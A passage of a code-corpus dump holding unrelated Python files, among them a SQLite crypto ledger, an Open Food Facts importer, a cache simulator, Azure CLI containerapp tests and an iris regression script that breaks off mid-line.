WHERE to_currency= cryptos.id OR cryptos.id=13 ORDER BY symbol;\n    '''\n    rows=cursor.execute(query)\n    cryptosInverts=[]\n    text=''\n    for row in rows:\n        text= '{} - {}'.format(row[0], row[1])\n        cryptosInverts.append(text)\n\n    conn.close()\n    return cryptosInverts\n\n\ndef printMovementsDB():\n    # Return the movements stored in the DB\n    conn 
= sqlite3.connect(database)\n    cursor = conn.cursor()\n\n    rows= cursor.execute('select date, time, from_currency, from_quantity, to_currency, to_quantity from movements order by date;')\n\n    movements = []\n    for row in rows:\n        row = list(row)\n        movements.append(row)\n\n    conn.close()\n    return(movements) \n\ndef addNewMovement(data, time, from_currency, to_currency,from_quantity, to_quantity):\n    # Add a new movement to the DB\n    conn = sqlite3.connect(database)\n    cursor = conn.cursor()\n\n    query = '''\n    INSERT INTO movements\n    (date, time, from_currency, from_quantity, to_currency, to_quantity)\n    values (?, ?, ?, ?, ?, ?);\n    '''\n    try:\n        rows = cursor.execute(query, ( data,\n                                       time,\n                                       from_currency, \n                                       from_quantity,\n                                       to_currency,\n                                       to_quantity,\n                                       ))\n\n    except sqlite3.Error as e:\n        \n        print('Error en base de datos : {}'.format(e))\n    \n    conn.commit()\n    conn.close()\n\ndef MoneySpend(crypto, isfrom=True ):\n    # Query the DB and return the summed amounts of a single currency, either in to_quantity (isfrom=False) or in from_quantity (isfrom=True)\n    if isfrom:\n        fieldSelect = 'from_quantity'\n        fieldWhere = 'from_currency'\n    else:\n        fieldSelect = 'to_quantity'\n        fieldWhere = 'to_currency'\n\n    conn =sqlite3.connect(database)\n    cursor = conn.cursor()\n    \n    query = '''\n    SELECT {}\n    FROM movements\n    WHERE {} in ( SELECT id\n                  FROM cryptos\n                  WHERE symbol = ?);\n    '''.format(fieldSelect, fieldWhere)\n\n    try:\n        rows=cursor.execute(query,(crypto,))\n        valor=0\n        try:\n            for row in rows:\n                valor+=row[0]\n        except Exception as e:\n            print('es en el for',e)\n        \n    except Exception as e:\n        print('Error en base de datos:',e)\n    conn.close()\n    return(valor)\n\ndef getIdFromToCryptoDB(crypto, isCrytpo = True):\n    # Get the id from the symbol, or the symbol from the id, depending on isCrytpo\n    if isCrytpo:\n        fieldSelect = 'id'\n        fieldWhere = 'symbol'\n    else:\n        fieldSelect = 'symbol'\n        fieldWhere = 'id'\n    \n    conn = sqlite3.connect(database)\n    cursor = conn.cursor()\n\n    query='''\n    SELECT {}\n    FROM cryptos\n    WHERE {}=?;\n    '''.format(fieldSelect, fieldWhere)\n    cursor.execute(query,(crypto,))\n    n=cursor.fetchone()\n    return (n[0])\n\ndef symbolCrytpo():\n    # Get the symbols of the cryptos stored in the table\n    conn = sqlite3.connect(database)\n    cursor = conn.cursor()\n\n    query='''\n    SELECT symbol\n    FROM cryptos;\n    '''\n    rows=cursor.execute(query)\n    symbol = []\n    for row in rows:\n        symbol.append(row[0])\n    return (symbol)\n\n\n\n","sub_path":"movementsDB.py","file_name":"movementsDB.py","file_ext":"py","file_size_in_byte":5507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
+{"seq_id":"512219634","text":"import requests\r\n\r\nfrom .models import Product, Favorite\r\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\r\n\r\nURL = 'https://world.openfoodfacts.org/language/french/'\r\n\r\ndef update_product(product_origin, product_updated):\r\n\t\"\"\"Replace all attributes of the object in the database by the attributes of the object built from OPC\"\"\"\r\n\tfor key in product_origin.__dict__:\r\n\t\tif key == 'id':\r\n\t\t\tcontinue\r\n\t\telse:\r\n\t\t\tproduct_origin.__dict__[key] = product_updated.__dict__[key]\r\n\treturn product_origin\r\n\r\ndef update_db():\r\n\t\"\"\"Function used to get all French products in the openfoodfacts database\"\"\"\r\n\tlast_page = False\r\n\ti = 1\r\n\twhile not last_page:\r\n\t\turl = URL + str(i) +'.json'\r\n\t\tdata = requests.get(url)\r\n\t\tdata = data.json()\r\n\t\tif data['products'] == []:\r\n\t\t\tlast_page = 
True\r\n\t\telse:\r\n\t\t\tfor product in data['products']:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tname = product['product_name']\r\n\t\t\t\t\tnutriscore = product['nutrition_grades']\r\n\t\t\t\t\tpicture = product['image_url']\r\n\t\t\t\t\tcategory = product['categories']\r\n\t\t\t\t\turl = product['url']\r\n\t\t\t\t\tpicture_nutrition = product['image_nutrition_url']\r\n\r\n\t\t\t\t\tif category == \"\" or name == \"\" or nutriscore == \"\" or picture == \"\" or url == \"\" or picture_nutrition == \"\":\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tproduct_to_save = Product(name=name, picture=picture, category=category, nutriscore=nutriscore, url=url, picture_nutrition=picture_nutrition)\r\n\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tproduct_to_update = Product.objects.get(id=product_to_save.id)\r\n\t\t\t\t\t\t\tproduct_to_update = update_product(product_to_update, product_to_save)\r\n\t\t\t\t\t\t\tproduct_to_update.save()\r\n\r\n\r\n\t\t\t\t\t\texcept ObjectDoesNotExist:\r\n\t\t\t\t\t\t\tproduct_to_save.save()\r\n\r\n\t\t\t\t\t\texcept MultipleObjectsReturned:\r\n\t\t\t\t\t\t\tcontinue\r\n\r\n\t\t\t\texcept KeyError:\r\n\t\t\t\t\tcontinue\r\n\t\t\ti = i+1\r\n\tprint('Mise à jour de la base terminée !')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tupdate_db()\r\n","sub_path":"store/update_db.py","file_name":"update_db.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"163420295","text":"T = int(input())\r\n\r\nfor CC in range(T):\r\n R, C, W = map(int,input().split())\r\n\r\n RowsN = C//W\r\n\r\n Find = False\r\n Ans = 0\r\n \r\n if W == 1:\r\n Ans = R*C\r\n Find = True\r\n\r\n if not Find:\r\n if C%W == 0:\r\n Ans = RowsN*R + W - 1\r\n else:\r\n Ans = RowsN*R + W\r\n\r\n print('Case #{}: {}'.format(CC+1,Ans))\r\n","sub_path":"solutions_5640146288377856_1/Python/BluElist/As.py","file_name":"As.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"465111930","text":"#This is a sample phone book program\n#Vincent Broyles is the author!\nnorth_area_codes = ('619','858','760','818')\nsouth_area_codes = ('343','676','232','979')\n\nnames = []\nnumbers = []\nzips_areas = {92029:858,92014:858,92020:619,92021:619,92057:760}\n\n\ndef get_full_name():\n first_name = input('What is your first name?')\n last_name = input ('What is your last name?')\n full_name = (first_name + ' ' + last_name)\n return full_name\n\ndef get_phone_number():\n area_code = input('Area Code?')\n '''\n if area_code not in north_area_codes:\n print ('Area code not covered1.')\n return\n if area_code not in south_area_codes:\n print ('Area code not covered2.')\n return\n '''\n phone_number = input('Phone number?')\n full_entry = ('(' + area_code + ')' + phone_number)\n return full_entry\n\ndef link_area_to_zip_code():\n print(\"Hi\")\n \n\n#Ask the data entry person how many numbers they want to enter\niterations = input ('How many numbers to enter?')\nint_iterations = int(iterations)\nprint(int_iterations)\n\nfor i in range(int_iterations):\n ''' run the functions to get the\n name and the numbers, and then\n append that onto the running list\n '''\n temp_name = get_full_name()\n names.append(temp_name)\n temp_number = get_phone_number()\n numbers.append(temp_number)\n try:\n print (temp_name + ' ' + temp_number)\n except(TypeError):\n print ('There was a problem, try again.')\n\nprint ('Here is the full list:')\n\n#Now print out the 
full array of names and numbers\nfor i in range(int_iterations):\n print (names[i] + ' ' + numbers[i])\n\n \n","sub_path":"phone_book_1.py","file_name":"phone_book_1.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"643403814","text":"#Kevin Sherman\n#Daniel Stambler\n#ksherma6@jhu.edu\n#dstambl2@jhu.edu\n\nimport sys\nimport math\nfrom Cache import Cache\n\n#Checks that command line args are valid\ndef check_validity_of_args(set, block, byte, w_a, w_t, least_recent, input_file):\n\n #masks to check powers of 2\n set_mask = set - 1\n block_mask = block -1\n byte_mask = byte - 1\n set_result = set & set_mask\n block_result = block & block_mask\n byte_result = byte & byte_mask\n\n if w_a != 0 and w_a != 1:\n raise ValueError(\"Improper command line arg\")\n exit(0)\n if w_t != 0 and w_t != 1:\n raise ValueError(\"Improper command line arg\")\n exit(0)\n if least_recent != 0 and least_recent != 1:\n raise ValueError(\"Improper command line arg\")\n exit(0)\n if w_a == 0 and w_t == 0:\n raise ValueError(\"Improper command line arg\")\n exit(0)\n if byte < 0 or set_result != 0:\n raise ValueError(\"Improper command line arg\")\n exit(0)\n if byte < 0 or block_result != 0:\n raise ValueError(\"Improper command line arg\")\n exit(0)\n if byte < 4 or byte_result != 0:\n raise ValueError(\"Improper command line arg\")\n exit(0)\n file_check = input_file.split(\".\")\n if file_check[1] != \"trace\":\n raise ValueError(\"Improper command line arg\")\n exit(0)\n\ndef getMemVals(mem, ind, off):\n mem_int = int(mem, 0)\n mem_int = mem_int >> off\n x=0\n x = 1 << (ind)\n x -= 1\n ind_val = mem_int & x\n tag = mem_int >> ind\n return ind_val, tag\n\ndef readfile(filename, index, offset, myCache):\n with open(filename) as f:\n for line in f:\n input = (str(line)).split(\" \")\n s1 = input[0]\n mem_address = input[1]\n ind_val, tag = getMemVals(mem_address, index, offset)\n if s1 == 'l':\n myCache.load(tag, ind_val)\n elif s1 == 's':\n myCache.store(tag, ind_val)\n else:\n raise ValueError(\"Load and Save must be l or s\")\n exit(0)\n\ndef main():\n if len(sys.argv) != 8:\n raise ValueError(\"Too many or too few arguments\")\n exit(0)\n num_sets = int(sys.argv[1])\n num_blocks = int(sys.argv[2])\n num_bytes = int(sys.argv[3])\n write_allocate_or_not = int(sys.argv[4])\n write_through_or_back = int(sys.argv[5])\n eviction = int(sys.argv[6])\n input_file = sys.argv[7]\n\n check_validity_of_args(num_sets, num_blocks, num_bytes, write_allocate_or_not, write_through_or_back, eviction, input_file)\n\n #get index and offset\n index = int(math.log(num_sets,2))\n offset = int(math.log(num_bytes,2))\n\n simpleCache = Cache(num_sets, num_blocks, num_bytes, write_allocate_or_not, write_through_or_back, eviction)\n readfile(input_file, index, offset, simpleCache)\n\n total_load, total_store, load_hits, load_miss, store_hits, store_miss, total_cycles = simpleCache.get_cycles()\n print(\"Total loads: \" + str(total_load))\n print(\"Total stores: \" + str(total_store))\n print(\"Load hits: \" + str(load_hits))\n print(\"Load misses: \" + str(load_miss))\n print(\"Store hits: \" + str(store_hits))\n print(\"Store misses: \" + str(store_miss))\n print(\"Total cycles: \" + str(int(total_cycles)))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"csim.py","file_name":"csim.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} 
+{"seq_id":"331967143","text":"from test_lightsaft import LightSAFTPredictor\n\n# a light-weight version of LaSAFT+GPoCM\n\n\"\"\"\n@inproceedings{choi2021lasaft,\n title={LaSAFT: Latent Source Attentive Frequency Transformation for Conditioned Source Separation},\n author={Choi, Woosung and Kim, Minseok and Chung, Jaehwa and Jung, Soonyoung},\n booktitle={ICASSP 2021-2021 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP)},\n pages={171--175},\n year={2021},\n organization={IEEE}\n}\n\"\"\"\n\n# Github Repository: https://github.com/ws-choi/music-demixing-challenge-starter-kit\n# Github Repository of the original paper: https://github.com/ws-choi/Conditioned-Source-Separation-LaSAFT\n# Demonstration site of the original paper: https://lasaft.github.io/\n\nlightsaft_predictor = LightSAFTPredictor()\nsubmission = lightsaft_predictor\nsubmission.run()\nprint(\"Successfully completed music demixing...\")\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"369168629","text":"\ndef run():\n n = int (input(\"Ingrese un numero: \"))\n tabla = []\n potencia = 0\n frac = 0\n suma = 0\n\n for i in range(1,n+1):\n potencia = i \n frac = 1/(2**i)\n suma += frac\n tabla.append([potencia,frac,suma])\n print (\"Potencia --- Fraccion ----------- Suma\")\n x=n\n c=0\n for i in range(n):\n if c < 9:\n print(\"{} ---------- {} --{} {}\".format(tabla[i][0],tabla[i][1],\"-\"*(x-1),tabla[i][2] ))\n x-=1\n c+=1\n elif c >= 9:\n print(\"{} --------- {} --{} {}\".format(tabla[i][0],tabla[i][1],\"-\"*(x-1),tabla[i][2] ))\n x-=1\n c+=1\n \n\n\nif __name__ == \"__main__\":\n run()","sub_path":"Ejercicios/Ciclos/SumaFracionDos.py","file_name":"SumaFracionDos.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"385319229","text":"#!/usr/bin/env python\n\nimport logging\nimport sys\nimport os\nimport requests\nfrom urllib3.util.retry import Retry\nfrom requests.adapters import HTTPAdapter\nimport socket\n\nroot = logging.getLogger()\nroot.setLevel(logging.DEBUG)\n\nch = logging.StreamHandler(sys.stdout)\nch.setLevel(logging.DEBUG)\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nch.setFormatter(formatter)\nroot.addHandler(ch)\n\ndef get_logger(): \n return root\n\ndef retry_session(retries, session=None, backoff_factor=0.3, status_forcelist=(500, 502, 503, 504)):\n session = session or requests.Session()\n retry = Retry(\n total=retries,\n read=retries,\n connect=retries,\n backoff_factor=backoff_factor,\n status_forcelist=status_forcelist,\n method_whitelist=['HEAD', 'TRACE', 'GET', 'PUT', 'OPTIONS', 'DELETE', 'POST'],\n raise_on_status=False\n )\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n return session\n\ndef verify_expected_vars(expected_vars):\n root.info(msg='Verifying all expected variables exist: {}'.format(expected_vars))\n for v in expected_vars:\n if not os.getenv(v):\n root.critical(msg=\"{} environment variable is NOT SET!\".format(v))\n exit(77)\n else:\n root.debug(msg='{} environment variable is set with value {}'.format(v, os.getenv(v)))\n\n\ndef hostname_resolution(VAULT_ADDR):\n VAULT_RESOLV=VAULT_ADDR.split(\"//\")[1].split(\":\")[0]\n logging.info(VAULT_RESOLV)\n\n print('Trying to resolve {}:'.format(VAULT_RESOLV))\n try:\n 
VAULT_IP=socket.gethostbyname(VAULT_RESOLV)\n        logging.debug(VAULT_IP)\n        print('Successful in getting vault ip DNS is working fine:',VAULT_IP)\n        print(\"Url passed will be: \",VAULT_ADDR)\n        return VAULT_ADDR\n    \n    except socket.gaierror as error:\n        logging.critical(\"Unable to get VAULT_IP from vault address, Hardcoded ip will be used\")\n        print(\"There was error in resolving {}\".format(VAULT_RESOLV))\n        print(error)\n        logging.info(\"Trying with Hardcoded ip\")\n        # Check the 'uk' variants first: 'ukedc' also contains 'edc', so testing\n        # 'edc' first would shadow the UK branches and they could never match.\n        if 'ukedc' in VAULT_ADDR:\n            VAULT_IP = 'https://10.113.188.253:8300'\n            return VAULT_IP\n        elif 'ukndc' in VAULT_ADDR:\n            VAULT_IP = 'https://10.113.186.253:8300'\n            return VAULT_IP\n        elif 'edc' in VAULT_ADDR:\n            VAULT_IP = 'https://10.123.82.190:8300'\n            return VAULT_IP\n        elif 'ndc' in VAULT_ADDR:\n            VAULT_IP = 'https://10.121.83.103:8300'\n            return VAULT_IP\n    except:\n        logging.critical(\"Unable to reach vault, please check vault if vault is up:\")\n","sub_path":"windows/commonutil.py","file_name":"commonutil.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
+{"seq_id":"63959274","text":"from mesh_module import *\nimport visualize as viz\nimport sys\nimport os\n\nfaces = ['front', 'left', 'right', 'bottom', 'top']\n\nif __name__ == \"__main__\":\n    if len(sys.argv) < 3:\n        print(\"How to use: > run.py 'fisheye model type' 'resolution'\")\n        print(\"ex) run.py equidistance 64\")\n        exit()\n\n    fisheye_type = sys.argv[1]\n    resolution = int(sys.argv[2])\n    square_obj_dir = \"square_objs\"\n    fish_obj_dir = \"fish_objs\"\n    if not os.path.exists(square_obj_dir):\n        os.makedirs(square_obj_dir)\n\n    if not os.path.exists(fish_obj_dir):\n        os.makedirs(fish_obj_dir)\n\n    fish_meshes = []\n    for face in faces:\n        s_mesh = SquareMesh(face, resolution)\n        s_mesh.write_obj(\"%s/%s\" % (square_obj_dir, face))\n        f_mesh = FishMesh(fisheye_type, s_mesh)\n        f_mesh.write_obj(\"%s/%s\" % (fish_obj_dir, face))\n        fish_meshes.append(f_mesh)\n\n    viz.visualize_fisheye_mesh(fish_meshes, faces, ['b', 'r', 'y', 'c', 'm'])\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
+{"seq_id":"631123024","text":"#!/usr/bin/env python\n\nfrom itertools import combinations\nfrom itertools import permutations\n\npeople = ['M', 'F', 'A', 'B', 'C']\n\n\ndef is_child(a):\n    if a in ['A', 'B', 'C']:\n        return True\n    return False\n\ndef child_is_next_to_child(arr):\n    #print(arr)\n    for idx,x in enumerate(arr):\n        #print(idx,x)\n        if idx == len(arr) - 1:\n            break\n        if is_child(x) and is_child(arr[idx+1]):\n            return True\n        #if idx == len(arr) and is_child(x) and is_child(arr[x-1]):\n        #    return True\n    print(arr)\n    return False\n\ndef main():\n    people = ['M', 'F', 'A', 'B', 'C']\n    #combos = [x for x in combinations(people, len(people))]\n    perms = [x for x in permutations(people, len(people))]\n\n    bad = [x for x in perms if child_is_next_to_child(x)]\n    good = [x for x in perms if not child_is_next_to_child(x)]\n\n    print('bad: %s' % len(bad))\n    print('good: %s' % len(good))\n    #import epdb; epdb.st()\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"extras/C960/PA_32.py","file_name":"PA_32.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
+{"seq_id":"16111676","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. 
All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nimport os\nimport time\nfrom time import sleep\nfrom azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer, JMESPathCheck, live_only)\nfrom subprocess import run\n\nfrom .common import (write_test_file, TEST_LOCATION, clean_up_test_file)\nfrom .utils import create_containerapp_env\n\nTEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))\n\n\nclass ContainerappPreviewScenarioTest(ScenarioTest):\n def __init__(self, method_name, config_file=None, recording_name=None, recording_processors=None,\n replay_processors=None, recording_patches=None, replay_patches=None, random_config_dir=False):\n\n super().__init__(method_name, config_file, recording_name, recording_processors, replay_processors,\n recording_patches, replay_patches, random_config_dir)\n cmd = ['azdev', 'extension', 'add', 'connectedk8s']\n run(cmd, check=True)\n cmd = ['azdev', 'extension', 'add', 'k8s-extension']\n run(cmd, check=True)\n # Wait for extensions to be installed\n # We mock time.sleep in azure-sdk-tools, that's why we need to use sleep here.\n sleep(120)\n\n @ResourceGroupPreparer(location=\"eastus\", random_name_length=15)\n def test_containerapp_preview_environment_type(self, resource_group):\n self.cmd('configure --defaults location={}'.format(TEST_LOCATION))\n aks_name = \"my-aks-cluster\"\n connected_cluster_name = \"my-connected-cluster\"\n custom_location_id = None\n try:\n self.cmd(f'aks create --resource-group {resource_group} --name {aks_name} --enable-aad --generate-ssh-keys --enable-cluster-autoscaler --min-count 4 --max-count 10 --node-count 4')\n self.cmd(f'aks get-credentials --resource-group {resource_group} --name {aks_name} --overwrite-existing --admin')\n\n self.cmd(f'connectedk8s connect --resource-group {resource_group} --name {connected_cluster_name}')\n connected_cluster = self.cmd(f'az connectedk8s show --resource-group {resource_group} --name {connected_cluster_name}').get_output_in_json()\n\n connected_cluster_id = connected_cluster.get('id')\n extension = self.cmd(f'az k8s-extension create'\n f' --resource-group {resource_group}'\n f' --name containerapp-ext'\n f' --cluster-type connectedClusters'\n f' --cluster-name {connected_cluster_name}'\n f' --extension-type \"Microsoft.App.Environment\" '\n f' --release-train stable'\n f' --auto-upgrade-minor-version true'\n f' --scope cluster'\n f' --release-namespace appplat-ns'\n f' --configuration-settings \"Microsoft.CustomLocation.ServiceAccount=default\"'\n f' --configuration-settings \"appsNamespace=appplat-ns\"'\n f' --configuration-settings \"clusterName={connected_cluster_name}\"'\n f' --configuration-settings \"envoy.annotations.service.beta.kubernetes.io/azure-load-balancer-resource-group={resource_group}\"').get_output_in_json()\n custom_location_name = \"my-custom-location\"\n custom_location_id = self.cmd(f'az customlocation create -g {resource_group} -n {custom_location_name} -l {TEST_LOCATION} --host-resource-id {connected_cluster_id} --namespace appplat-ns -c {extension[\"id\"]}').get_output_in_json()['id']\n except Exception as e:\n pass\n\n # create connected environment with client or create a command for connected?\n sub_id = self.cmd('az account show').get_output_in_json()['id']\n\n connected_env_name = 'my-connected-env'\n connected_env_resource_id = 
f\"/subscriptions/{sub_id}/resourceGroups/{resource_group}/providers/Microsoft.App/connectedEnvironments/{connected_env_name}\"\n file = f\"{resource_group}.json\"\n env_payload = '{{ \"location\": \"{location}\", \"extendedLocation\": {{ \"name\": \"{custom_location_id}\", \"type\": \"CustomLocation\" }}, \"Properties\": {{}}}}' \\\n .format(location=TEST_LOCATION, custom_location_id=custom_location_id)\n write_test_file(file, env_payload)\n self.cmd(f'az rest --method put --uri \"{connected_env_resource_id}?api-version=2022-06-01-preview\" --body \"@{file}\"')\n containerapp_env = self.cmd(f'az rest --method get --uri \"{connected_env_resource_id}?api-version=2022-06-01-preview\"').get_output_in_json()\n while containerapp_env[\"properties\"][\"provisioningState\"].lower() != \"succeeded\":\n time.sleep(5)\n containerapp_env = self.cmd(\n f'az rest --method get --uri \"{connected_env_resource_id}?api-version=2022-06-01-preview\"').get_output_in_json()\n\n ca_name = self.create_random_name(prefix='containerapp', length=24)\n self.cmd(\n f'az containerapp create --name {ca_name} --resource-group {resource_group} --environment {connected_env_name} --image \"mcr.microsoft.com/k8se/quickstart:latest\" --environment-type connected',\n checks=[\n JMESPathCheck('properties.environmentId', connected_env_resource_id),\n JMESPathCheck('properties.provisioningState', \"Succeeded\")\n ])\n ca_name2 = self.create_random_name(prefix='containerapp', length=24)\n self.cmd(\n f'az containerapp create --name {ca_name2} --resource-group {resource_group} --environment {connected_env_resource_id} --image \"mcr.microsoft.com/k8se/quickstart:latest\" --environment-type connected',\n checks=[\n JMESPathCheck('properties.environmentId', connected_env_resource_id),\n JMESPathCheck('properties.provisioningState', \"Succeeded\")\n ])\n\n # test show/list/delete\n self.cmd('containerapp list -g {}'.format(resource_group), checks=[\n JMESPathCheck('length(@)', 2)\n ])\n\n self.cmd('containerapp list -g {} --environment-type {}'.format(resource_group, 'connected'), checks=[\n JMESPathCheck('length(@)', 2)\n ])\n\n self.cmd('containerapp list -g {} --environment-type {} --environment {}'.format(resource_group, 'connected', connected_env_name), checks=[\n JMESPathCheck('length(@)', 2)\n ])\n\n self.cmd('containerapp list -g {} --environment-type {}'.format(resource_group, 'managed'), checks=[\n JMESPathCheck('length(@)', 0)\n ])\n\n app2 = self.cmd('containerapp show -n {} -g {}'.format(ca_name2, resource_group)).get_output_in_json()\n self.cmd('containerapp delete --ids {} --yes'.format(app2['id']))\n\n self.cmd('containerapp delete -n {} -g {} --yes'.format(ca_name, resource_group))\n\n self.cmd('containerapp list -g {}'.format(resource_group), checks=[\n JMESPathCheck('length(@)', 0)\n ])\n clean_up_test_file(file)\n\n @ResourceGroupPreparer(location=\"eastus\")\n def test_containerapp_preview_e2e(self, resource_group):\n self.cmd('configure --defaults location={}'.format(TEST_LOCATION))\n\n env_name = self.create_random_name(prefix='containerapp-env', length=24)\n ca_name = self.create_random_name(prefix='containerapp', length=24)\n\n create_containerapp_env(self, env_name, resource_group)\n\n containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()\n\n self.cmd(\n f'az containerapp create --name {ca_name} --resource-group {resource_group} --environment {env_name} --image \"mcr.microsoft.com/k8se/quickstart:latest\" --environment-type managed',\n 
checks=[\n JMESPathCheck('properties.environmentId', containerapp_env['id']),\n JMESPathCheck('properties.provisioningState', \"Succeeded\")\n ])\n\n app = self.cmd(\n 'containerapp show -n {} -g {}'.format(ca_name, resource_group),\n checks=[\n JMESPathCheck('properties.environmentId', containerapp_env['id']),\n JMESPathCheck('properties.provisioningState', \"Succeeded\"),\n JMESPathCheck('name', ca_name),\n ]\n ).get_output_in_json()\n\n self.cmd('containerapp list -g {}'.format(resource_group), checks=[\n JMESPathCheck('length(@)', 1)\n ])\n\n self.cmd('containerapp list -g {} --environment-type {}'.format(resource_group, 'managed'), checks=[\n JMESPathCheck('length(@)', 1)\n ])\n\n self.cmd('containerapp delete --ids {} --yes'.format(app['id']))\n\n self.cmd('containerapp list -g {}'.format(resource_group), checks=[\n JMESPathCheck('length(@)', 0)\n ])\n","sub_path":"src/containerapp/azext_containerapp/tests/latest/test_containerapp_preview_scenario.py","file_name":"test_containerapp_preview_scenario.py","file_ext":"py","file_size_in_byte":9214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"454417945","text":"\r\n\"\"\"\r\nCreated on Wed Aug 25 12:52:52 2021\r\nAI and deep learnin with Python\r\nData types and operators\r\nQuiz Data types and Operators \r\n\r\n\"\"\"\r\n# The current volume of a water reservoir is ( in cubic meters)\r\nreservoir_volume = 4.445e8\r\n\r\n# The amount of rainfall from a storm (in cubic meters)\r\nrainfall = 5e6\r\n\r\n# Decrease the rainfall variable by 10% to account for runoff\r\nrainfall *= 0.9 \r\n\r\n# add the rainfall variable to the reservoir_volume variable\r\nreservoir_volume += rainfall\r\n\r\nprint(reservoir_volume)","sub_path":"PythonProgramming/DataTypesOperatorsQuiz.py","file_name":"DataTypesOperatorsQuiz.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"38111311","text":"'''\nName : Niya Jaison\nThe program does:\n 1. Training a model via linear regression\n 2. Using the trained model to do the classification\n 3. 
Calculate the best N value to choose for N-fold cross validation\n\n'''\nimport pandas as data\nimport numpy\n\n# Reading the data from the iris and adding the feature names\n\nfeatureName = ['sepalLength', 'sepalWidth', 'petalLength', 'petalWidth', 'flowerClass']\n\nirisData = data.read_csv('iris_data.csv',header = None,names = featureName)\n#print(irisData)\nfoldValues=[3,5,10]\n\n# Splitting data into X and Y\n\nX = irisData[['sepalLength', 'sepalWidth', 'petalLength', 'petalWidth']]\n#X = irisData[[0,1,2,3]]\n#print(X.values)\nY =irisData.flowerClass.map({'Iris-setosa':1.0,'Iris-versicolor':2.0,'Iris-virginica':3.0})\nfoldAccuracy=[0.0,0.0,0.0]\ncorrect_label=0\np=0\nfold_accuracy_per_fold=[0]\n# Performing k-fold cross validation\nfor i in foldValues :\n    del fold_accuracy_per_fold[0:len(fold_accuracy_per_fold)] \n    splitValue = len(X)/i #calculating the intervals based on the k-fold k value\n    #print(splitValue)\n    for j in range(i) :\n        splt_lower=int(j*splitValue)\n        splt_upper=int((j+1)*splitValue)\n        # Choosing the test split for this fold\n        xTest=numpy.array(X[splt_lower:splt_upper])\n        yTest=numpy.array(Y[splt_lower:splt_upper])\n        xTrain =list(X.values)\n        yTrain=list(Y.values)\n        del xTrain[splt_lower : splt_upper : 1]\n        del yTrain[splt_lower : splt_upper : 1]\n       # del xTrain[2:3]\n       # print(len(xTrain))\n        xTrain= numpy.array(xTrain)\n        yTrain= numpy.array(yTrain)    \n        # beta = (X'X)^-1 X'Y - Creating a training Model\n        beta = numpy.row_stack(numpy.dot(numpy.dot(numpy.linalg.inv(numpy.dot(xTrain.T,xTrain)),xTrain.T),yTrain))\n\n        #print(beta)\n\n        # Calculating Y = X. beta - Performing Classification\n\n        yTest_pred =numpy.row_stack( numpy.dot(xTest,beta))\n        \n        '''print(yTest_pred)\n        #print(numpy.round(yTest_pred))\n        #print(len(yTest))\n        #print(len(yTest_pred))'''\n        \n        yTest_pred = numpy.round(yTest_pred) # Rounding the predicted value to the nearest whole number (labels 1, 2 or 3)\n        for k in range(len(yTest_pred)) :  # Checking the accuracy of the predicted y value against the actual y value\n            if(yTest_pred[k] == yTest[k]) :\n                correct_label +=1\n        fold_accuracy_per_fold.insert(j,correct_label/splitValue)\n        correct_label=0\n    #print(fold_accuracy_per_fold)\n    foldAccuracy.insert(p,sum(fold_accuracy_per_fold)/(len(fold_accuracy_per_fold)))\n    p+=1\n    #print(foldAccuracy)\n    del fold_accuracy_per_fold[0:len(fold_accuracy_per_fold)] # clearing the list that stores the accuracy of each of the folds\n    #print(fold_accuracy_per_fold) \n    \nhighest_accuracy_fold = foldAccuracy.index(max(foldAccuracy)) # finding the index of the fold accuracy which has max value\n#print(foldAccuracy)\n\nprint('Selected N value (in N-fold) for cross validation :',foldValues[highest_accuracy_fold],'(Accuracy : ',foldAccuracy[highest_accuracy_fold]*100,'%)\\n')\n\nsplitValue = len(X)/foldValues[highest_accuracy_fold] # recompute the split size for the selected fold (it still holds the value from the last loop iteration)\nfor l in range(foldValues[highest_accuracy_fold]) :\n    splt_lower=int(l*splitValue)\n    splt_upper=int((l+1)*splitValue)\n    # Choosing the test split for this fold\n    xTest=numpy.array(X[splt_lower:splt_upper])\n    yTest=numpy.array(Y[splt_lower:splt_upper])\n    xTrain 